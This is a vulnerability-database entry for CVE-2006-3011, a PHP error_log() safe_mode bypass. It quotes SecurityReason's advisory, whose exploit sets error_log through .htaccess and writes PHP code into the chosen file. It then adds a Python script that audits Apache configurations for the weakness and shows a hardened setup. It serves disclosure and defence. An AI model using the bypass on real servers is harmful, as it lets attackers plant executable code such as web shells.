PHP error_log() Function Safe Mode Restriction Bypass Vulnerability

Vulnerability ID: 1116787    Type: Permissions, Privileges and Access Control
Published: 2008-11-20    Updated: 2008-11-20
CVE: CVE-2006-3011    CNNVD ID: CNNVD-200606-501
Platform: Multiple    CVSS score: 4.6
|Sources
https://www.exploit-db.com/exploits/7171
https://www.securityfocus.com/bid/18645
https://cxsecurity.com/issue/WLB-2006060134
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-501
|Details
PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML. PHP's error_log() function contains a safe mode restriction bypass vulnerability. A user who can load arbitrary PHP code, or who can control the arguments passed to an error_log() call, can exploit it to read or write restricted files on the target system. The exploit text below is SecurityReason's 2008 follow-up advisory (SecurityAlert 57) against PHP 5.2.6; the original 2006 finding for PHP 5.1.4 and 4.4.2 is SecurityAlert 41, listed in the references.
|Exploit
[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.11.2008
- Public: 20.11.2008

SecurityReason Research
SecurityAlert Id: 57

CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl 
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web 
developers to write dynamically generated pages quickly.

error_log

These functions allow you to define your own error handling rules, as well as modify the way errors are 
logged. This lets you change and enhance error reporting to suit your needs.

--- 1. error_log const. bypassed by php_admin_flag ---
The main problem lies in the difference between enabling safe_mode globally, in

php.ini:
safe_mode = On

and declaring it via php_admin_flag:

<Directory "/www">
...
	php_admin_flag safe_mode On
</Directory>

When we create a PHP script in /www/ and call:

ini_set("error_log", "/hack/");

or put in /www/.htaccess:

php_value error_log "/hack/bleh.php"


Result:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4


That was with safe_mode declared in php.ini. But if we use

php_admin_flag safe_mode On 

in httpd.conf instead, we get only:

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

The .htaccess syntax

php_value error_log "/hack/blehx.php"

is allowed and bypasses safe_mode.

Example exploit:
error_log("<?php phpinfo(); ?>", 0); // type 0: append the message to the file named by the error_log directive

--- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup

Note:
Do not rely on safe_mode as your main safeguard.

--- 3. Greets ---
sp3x Infospec schain p_e_a pi3

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

# milw0rm.com [2008-11-20]
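The following is an added example, not part of the SecurityReason advisory above or of PHP itself: a small Python audit of one Apache mod_php scope for the weak setup the advisory describes (safe_mode turned on per <Directory> with php_admin_flag while error_log stays overridable from .htaccess), beside the hardened form (error_log pinned with php_admin_value, AllowOverride None, open_basedir set). It assumes the mod_php directive semantics documented in the PHP manual: php_admin_value and php_admin_flag are valid only in httpd.conf and cannot be overridden by .htaccess or ini_set(), whereas php_value and php_flag may appear in .htaccess when AllowOverride includes Options or All. The config snippets, the /www/uploads/log.php variant, the log path under /var/log/php and the PHP_EXTENSIONS list are constructed for the example.

```python
"""Added example (not from the advisory or the PHP project): audit an Apache
mod_php scope for the overridable error_log target the advisory abuses.

Assumed directive semantics (PHP manual): php_admin_value/php_admin_flag are
only valid in httpd.conf and cannot be overridden by .htaccess or ini_set();
php_value/php_flag can be set in .htaccess when AllowOverride includes Options
or All. All configuration text below is constructed for this example."""
import posixpath
import re

_DIRECTIVE = re.compile(
    r'^\s*(php_admin_value|php_admin_flag|php_value|php_flag)\s+(\S+)\s+(.+?)\s*$',
    re.IGNORECASE)
_ALLOW_OVERRIDE = re.compile(r'^\s*AllowOverride\s+(.+?)\s*$',
                             re.IGNORECASE | re.MULTILINE)
PHP_EXTENSIONS = ('.php', '.phtml')  # assumption: extensions the handler maps to PHP


def parse_scope(text):
    """php_* directives of one scope as {ini_key: (value, set_by_admin_directive)}.
    Later lines win, matching Apache's merge order within a single scope."""
    settings = {}
    for line in text.splitlines():
        m = _DIRECTIVE.match(line)
        if m:
            directive, key, value = m.groups()
            settings[key.lower()] = (value.strip('"'),
                                     directive.lower().startswith('php_admin'))
    return settings


def htaccess_can_set_php(directory_conf):
    """True if .htaccess under this <Directory> may carry php_value/php_flag.
    A missing AllowOverride is treated as 'All' (Apache 2.2 default; 2.4 defaults to None)."""
    m = _ALLOW_OVERRIDE.search(directory_conf)
    tokens = (m.group(1) if m else 'All').split()
    return any(t.lower() in ('all', 'options') for t in tokens)


def effective_settings(directory_conf, htaccess):
    """Merge the <Directory> scope with the .htaccess below it the way mod_php does."""
    merged = parse_scope(directory_conf)
    if htaccess_can_set_php(directory_conf):
        for key, (value, is_admin) in parse_scope(htaccess).items():
            if is_admin:
                continue  # php_admin_* is rejected in .htaccess (Apache answers 500)
            if key in merged and merged[key][1]:
                continue  # pinned by php_admin_* in httpd.conf; .htaccess cannot change it
            merged[key] = (value, False)
    return merged


def _is_on(setting):
    return setting is not None and setting[0].lower() in ('on', '1', 'true', 'yes')


def audit(directory_conf, htaccess, docroot):
    """Return a list of findings for the scope (an empty list means nothing found)."""
    eff = effective_settings(directory_conf, htaccess)
    findings = []
    log = eff.get('error_log')
    pinned = log is not None and log[1]
    if not pinned and htaccess_can_set_php(directory_conf):
        findings.append('error_log is overridable from .htaccess (php_value): any script '
                        'author in this scope chooses the file that error_log() appends to')
        if _is_on(eff.get('safe_mode')):
            findings.append("the advisory's case: safe_mode set per-Directory with "
                            'php_admin_flag does not veto the .htaccess error_log override')
    if log is not None:
        target = posixpath.normpath(log[0])
        root = posixpath.normpath(docroot).rstrip('/') + '/'
        if target.startswith(root) and target.lower().endswith(PHP_EXTENSIONS):
            findings.append(f'error_log target {target} is a PHP file inside DocumentRoot: '
                            'error_log("<?php ... ?>", 0) turns it into a web shell')
    return findings


# --- constructed samples ---------------------------------------------------
ADVISORY_DIRECTORY = """\
<Directory "/www">
    AllowOverride All
    php_admin_flag safe_mode On
</Directory>
"""
ADVISORY_HTACCESS = 'php_value error_log "/hack/blehx.php"\n'      # the advisory's line
WEBSHELL_HTACCESS = 'php_value error_log "/www/uploads/log.php"\n'  # variant inside DocumentRoot
HARDENED_DIRECTORY = """\
<Directory "/www">
    AllowOverride None
    php_admin_value error_log "/var/log/php/www-error.log"
    php_admin_value open_basedir "/www:/tmp"
</Directory>
"""

if __name__ == '__main__':
    for name, conf, ht in (('advisory', ADVISORY_DIRECTORY, ADVISORY_HTACCESS),
                           ('webshell', ADVISORY_DIRECTORY, WEBSHELL_HTACCESS),
                           ('hardened', HARDENED_DIRECTORY, WEBSHELL_HTACCESS)):
        print(name, 'effective error_log =', effective_settings(conf, ht).get('error_log'))
        for finding in audit(conf, ht, '/www'):
            print('  -', finding)
```

Running the module prints the effective error_log for each sample scope and the findings: the advisory's own scope yields two (overridable error_log; safe_mode not applied to the override), the in-webroot variant adds the web-shell finding, and the hardened scope yields none because AllowOverride None keeps php_value out of .htaccess and php_admin_value pins the log path regardless. safe_mode itself was deprecated in PHP 5.3 and removed in 5.4, so on any supported PHP the php_admin_value pinning together with open_basedir is the control that remains.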
|Affected products
PHP PHP 5.1.4
PHP PHP 4.4.2
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
|References

Source: SECUNIA  Name: 21546  Link: http://secunia.com/advisories/21546
Source: XF  Name: php-errorlog-safe-mode-bypass(27414)  Link: http://xforce.iss.net/xforce/xfdb/27414
Source: UBUNTU  Name: USN-320-1  Link: http://www.ubuntu.com/usn/usn-320-1
Source: www.php.net  Link: http://www.php.net/release_5_1_5.php
Source: OSVDB  Name: 26827  Link: http://www.osvdb.org/26827
Source: VUPEN  Name: ADV-2006-2523  Link: http://www.frsirt.com/english/advisories/2006/2523
Source: SECTRACK  Name: 1016377  Link: http://securitytracker.com/id?1016377
Source: SREASONRES  Name: 20060625error_log()SafeModeBypassPHP5.1.4and4.4.2  Link: http://securityreason.com/achievement_securityalert/41
Source: SECUNIA  Name: 21050  Link: http://secunia.com/advisories/21050
Source: SECUNIA  Name: 20818  Link: http://secunia.com/advisories/20818
Source: MANDRIVA  Name: MDKSA-2006:122  Link: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2006:122
Source: cvs.php.net  Link: http://cvs.php.net/viewvc.cgi/php-src/ext/standard/basic_functions.c?r1=1.543.2.51.2.9&r2=1.543.2.51.2.10&pathrev=PHP_4_4&diff_format=u
Source: cvs.php.net  Link: http://cvs.php.net/viewvc